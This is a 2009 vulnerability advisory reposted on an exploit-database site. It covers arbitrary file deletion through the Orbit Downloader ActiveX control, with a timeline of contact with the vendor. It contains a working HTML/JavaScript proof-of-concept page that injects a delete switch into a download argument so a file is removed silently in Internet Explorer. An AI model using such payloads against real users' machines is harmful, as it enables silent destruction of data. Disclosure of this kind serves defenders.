0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Orbit Downloader 2.8.7 Arbitrary File Deletion Vulnerability
[============================================================
Orbit Downloader 2.8.7 Arbitrary File Deletion Vulnerability
============================================================
[waraxe-2009-SA#073] - Arbitrary File Deletion in Orbit Downloader <= 2.8.7
===============================================================================
Author: Janek Vind "waraxe"
Date: 21. March 2009
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-73.html
Description of vulnerable software:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Orbit Downloader, leader of download manager revolution, is devoted to new
generation web (web2.0) downloading, such as video/music/streaming media from
Myspace, YouTube, Imeem, Pandora, Rapidshare, support RTMP. And to make general
downloading easier and faster.
http://www.orbitdownloader.com/
List of found vulnerabilities
===============================================================================
1. Arbitrary File Deletion
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
CLSID: {3F1D494B-0CEF-4468-96C9-386E2E4DEC90}
ProgID: Orbitmxt.Orbit
Executable: orbitmxt.dll
File Version: 2.1.0.2
Tested on following platforms:
1. Windows XP Pro SP3/IE 6 SP1
2. Windows Vista Ultimate 64-bit SP1/IE 7
In both cases IE security settings were default for Internet Zone.
Exploitation tests ended successfully without any warnings or other interaction
from Internet Explorer.
Proof Of Concept:
<html><head>
<title>Orbit Downloader <= 2.8.7 Arbitrary File Deletion PoC by waraxe</title>
<script>
function test()
{
waraxe.download('','','" /Lc:\\test.txt "','',1);
}
</script>
</head><body>
<object
id="waraxe" name="waraxe"
classid="CLSID:3F1D494B-0CEF-4468-96C9-386E2E4DEC90"
width="50" height="50">
</object>
<br><center>
<button onclick="javascript:test();"> Test </button>
</body></html>
For testing first create "test.txt" file to the C: root dir and
then use IE and hit test button. "test.txt" should be deleted for now :)
Disclosure Timeline:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
03/04/09 Developer contacted
03/04/09 Developer's initial response
03/04/09 Findings sent to developer
03/18/09 New version 2.8.7 released, no fix for specific issue!
03/21/09 Public disclosure
Greetings:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Greets to ToXiC, y3dips, Sm0ke, Heintz, slimjim100, pexli, mge, str0ke,
to all active waraxe.us forum members and to anyone else who know me!
---------------------------------- [ EOF ] ------------------------------------
# 0day.today [2024-11-16] #